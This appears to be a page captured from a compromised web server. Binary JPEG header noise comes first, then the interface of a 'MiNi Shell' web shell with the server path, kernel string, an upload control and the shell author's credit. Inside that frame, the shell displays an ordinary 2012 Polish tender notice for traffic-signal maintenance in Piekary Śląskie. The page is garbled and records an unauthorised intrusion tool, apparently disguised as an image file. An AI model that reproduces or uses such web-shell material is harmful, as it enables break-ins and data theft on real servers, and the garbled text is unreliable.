JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/250711-N-2012.html

<p class="kh_header"><b>Piekary Śląskie: Konserwacja i bieżące utrzymanie sygnalizacji świetlnych na terenie Miasta
Piekary Śląskie w okresie od 01.01.2013 r. do 31.12.2013 r.</b><br>
<b>Numer ogłoszenia: 250711 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta  Piekary Śląskie , ul. Bytomska 84, 41-940 Piekary Śląskie, woj. śląskie, tel. 032 3939337, faks (032) 287 22 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.piekary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i bieżące utrzymanie sygnalizacji świetlnych na terenie Miasta
Piekary Śląskie w okresie od 01.01.2013 r. do 31.12.2013 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest konserwacja i bieżące utrzymanie sygnalizacji świetlnych  terenie Miasta Piekary Śląskie w okresie od 01.01.2013 r. do 31.12.2013 r. 
 
I ASORTYMENT ROBÓT: CZYNNOŚCI  BIEŻĄCEGO  UTRZYMANIA  i  KONSERWACJI SYGNALIZACJI   ŚWIETLNYCH:

1.Kontrola pracy sygnalizacji i wyświetlanych sygnałów - codziennie w tym wymiana   
               uszkodzonych źródeł światła,
2.Przeglądy kontrolne połączeń w obwodach na obiekcie i w sterowniku,
3.Przegląd komunikatów dziennika sterownika,
4.Zlokalizowanie usterek w obwodach i ich usunięcie,
5.Kontrola i ustawienie dat i zegara sterownika,
6.Symulacja zadziałania sygnału wejściowego i wyjściowego,
7.Testowanie działania reakcji sterownika na wyświetlanie sygnałów kolizyjnych, 
8.Testowanie działania reakcji sterownika na brak wyświetlania sygnałów,
9.Kontrola właściwego funkcjonowania systemu detekcji wraz z  dostrojeniem,
10.Przegląd grupy funkcyjnej STATUS sterowników ASR,
11.Przegląd i czyszczenie sterowników.
12.Prowadzenie dziennika sygnalizacji (dla każdej sygnalizacji oddzielnie)

II ASORTYMENT ROBÓT: ROBOTY POWTARZALNE DLA UTRZYMANIA CIĄGŁOŚCI PRACY SYGNALIZACJI ŚWIETLNEJ WYNIKŁE Z TYPOWYCH AWARII LUB ZNISZCZENIA:
1.Wymiana latarni 3 komorowej ogólnej lub z symboliką LED na maszcie
2.Wymiana latarni 3 komorowej ogólnej lub z symboliką LED na wysięgniku
3.Wymiana latarni 2 komorowej na maszcie LED (dla pieszych)
4.Wymiana latarni 1 komorowej na maszcie LED (strzałka dopuszczająca, sygnalizator ostrzegawczy)
5.Wymiana jednej komory latarni 3 komorowej ogólnej lub z symboliką LED na maszcie
6.Wymiana jednej komory latarni 3 komorowej ogólnej lub z symboliką LED na wysięgniku
7.Wymiana jednej komory latarni 2 komorowej LED na maszcie (przejście dla pieszych)
8.Uzupełnienie lub wymiana soczewek ogólnych lub z symboliką
9.Uzupełnienie lub wymiana odbłyśników w komorach lub daszków komór
10.Wymiana przycisków dla pieszych z potwierdzeniem optycznym na masztach lub wysięgnikach
11.Naprawa lub wymiana sygnalizatorów akustycznych
12.Naprawa lub wymiana sygnalizatorów akustycznych z komunikatami głosowymi
13.Prostowanie masztu sygnalizacji
14.Wymiana masztu sygnalizacji
15.Montaż lub wymiana głowicy wierzchołkowej
16.Montaż lub wymiana ekranów kontrastowych
17.Montaż lub wymiana zawiesi dla latarń sygnalizacyjnych na wysięgnikach
18.Wymiana modułu grup wykonawczych sterownika ASR-STR1
19.Wymiana modułu grup wykonawczych sterownika ASR-STR2
20.Wymiana modułu grup wykonawczych sterownika ASR-STR-MINI4
21.Wymiana modułu dla pętli indukcyjnych ASR-PPI8
22.Wymiana modułu dla pętli indukcyjnych ASR-PPI4
23.Wymiana modułu dla pętli indukcyjnych ASR-FEIG4
24.Wymiana wkładu LED 200, 300 ogólnych lub z symboliką na wysięgniku
25.Wymiana wkładu LED 200, 300 ogólnych lub z symboliką na maszcie
26.Remont lub wymiana pętli indukcyjnej lub czujnika magnetycznego w jezdni
27.Czyszczenie i mycie latarni sygnalizacyjnej na maszcie
28.Czyszczenie i mycie latarni sygnalizacyjnej na wysięgniku
29.Czyszczenie i dwukrotne malowanie masztów sygnalizacji
30.Czyszczenie i dwukrotne malowanie wysięgników sygnalizacji

SYGNALIZACJE PODLEGAJĄCE KONSERWACJI I BIEŻĄCEMU UTRZYMANIU:
a)skrzyżowanie ulic DK-94 - Sadowskiego,
b)skrzyżowanie ulic DK-94 - Kotuchy,
c)ul. Bednorza - przejście dla pieszych,
d)skrzyżowanie ulic Bytomska - Wyszyńskiego,
e)ul. Bytomska - w rejonie szpitala - przejście dla pieszych,
f)skrzyżowanie ulic Bytomska - Pod Lipami,
g)ul. Bytomska - Bazylika - przejście dla pieszych,
h)skrzyżowanie ulic Bytomska - Papieża Jana Pawła II,
i)ul. Karola Miarki - wyjazd z PSP,
j)skrzyżowanie ulic DW 911 - Karola Miarki - Podmiejska,
k)skrzyżowanie ulic DW 911 - Papieża Jana Pawła II,
l)skrzyżowanie ulic Papieża Jana Pawła II  - Ziętka.
m)skrzyżowanie ulic Ziętka -  Konstytucji 3-go Maja, 
n)ul. Tarnogórska -  przejście dla pieszych
o)ul. Oświęcimska - przejście dla pieszych,
p)ul. Sadowskiego - przejście dla pieszych.

Wykonawca zobowiązany jest do:
a)stosowania do rozliczenia robót cen jednostkowych podanych w ofercie przetargowej,
b)zapewnienie całodobowej stałej łączności telefonicznej pomiędzy nim a Zamawiającym,
c)codziennego zgłoszenia do godz. 8.00 w Wydziale Inwestycji i Remontów Urzędu Miasta miejsc prowadzenia robót w tym dniu,
d)zapewnienia całodobowej dyspozycyjności tzn. przystąpienia do robót lub zabezpieczenia miejsca awarii w czasie nie przekraczającym 30 minut od momentu zgłoszenia przez pracowników  Wydziału Inwestycji i Remontów Urzędu Miasta lub ośrodka dyspozycyjnego, tj. Miejskiego Centrum Zarządzania Kryzysowego,   
e)przedstawienia w trakcie odbioru atestów na zabudowane materiały oraz rozliczenie materiałów z odzysku, stosowania oznakowania miejsc prowadzonych robót zgodnie z obowiązującymi przepisami
f)stosowania oznakowania miejsc prowadzonych robót zgodnie z obowiązującymi przepisami.
Wykonawca udzieli 36 miesięcy gwarancji na roboty związane z montażem nowych elementów sygnalizacji (nie dotyczy wymiany żarówek).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>usługi tego samego rodzaju o wartości do 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> -</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonanie w ostatnich trzech latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 1 usługi tożsamej z przedmiotem zamówienia o  wartości min. 180 tys. złotych brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie następującymi urządzeniami: 
1 podnośnik koszowy, 
1 urządzenie do wykrywania urządzeń podziemnych, 
1 urządzenie do badania i dostrajania pętli indukcyjnych, 
1 zestaw do wykonywania pomiarów elektrycznych, 
1 samochód przystosowany do przewozu osób, narzędzi i części zamiennych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. dysponowanie osobą do pełnienia funkcji kierownika budowy, z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń - zgodnie z prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów,
2. dysponowanie min. 1 osobą posiadającą ważne świadectwo kwalifikacyjne D uprawniające do wykonywania pracy na stanowisku dozoru w zakresie obsługi, konserwacji, remontów, montażu, zakresie kontrolno - pomiarowym dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1kV,
3. dysponowanie min. 2 osobami z ważnym świadectwem kwalifikacyjnym E uprawniającym do wykonywania pracy na stanowisku eksploatacji w zakresie: obsługi, konserwacji, remontów, montażu dla urządzeń, instalacji i sieci elektroenergetycznych o napięciu do 1 kV,
4. dysponowanie min. 1 osobą uprawnioną do obsługi podnośników montażowych na podwoziu samochodowym,
5. dysponowanie min. 2 osobami, które odbyły szkolenia i posiadają zaświadczenia lub kwalifikacje  uprawniające do kierowania ruchem drogowym</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 180  tysięcy złotych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piekary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piekary Śląskie, Biuro Zamówień Publicznych, pok. 218, ul. Bytomska 84, 41-940 Piekary Śląskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 09:00, miejsce: Urząd Miasta Piekary Śląskie, Biuro Zamówień Publicznych, pok. 218, ul. Bytomska 84, 41-940 Piekary Śląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com